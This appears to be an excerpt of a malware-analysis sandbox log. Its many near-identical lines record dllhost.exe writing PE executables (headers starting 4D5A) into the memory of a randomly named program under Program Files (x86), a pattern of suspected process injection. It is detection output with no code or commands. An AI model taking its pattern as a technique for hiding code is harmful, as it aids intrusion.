Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
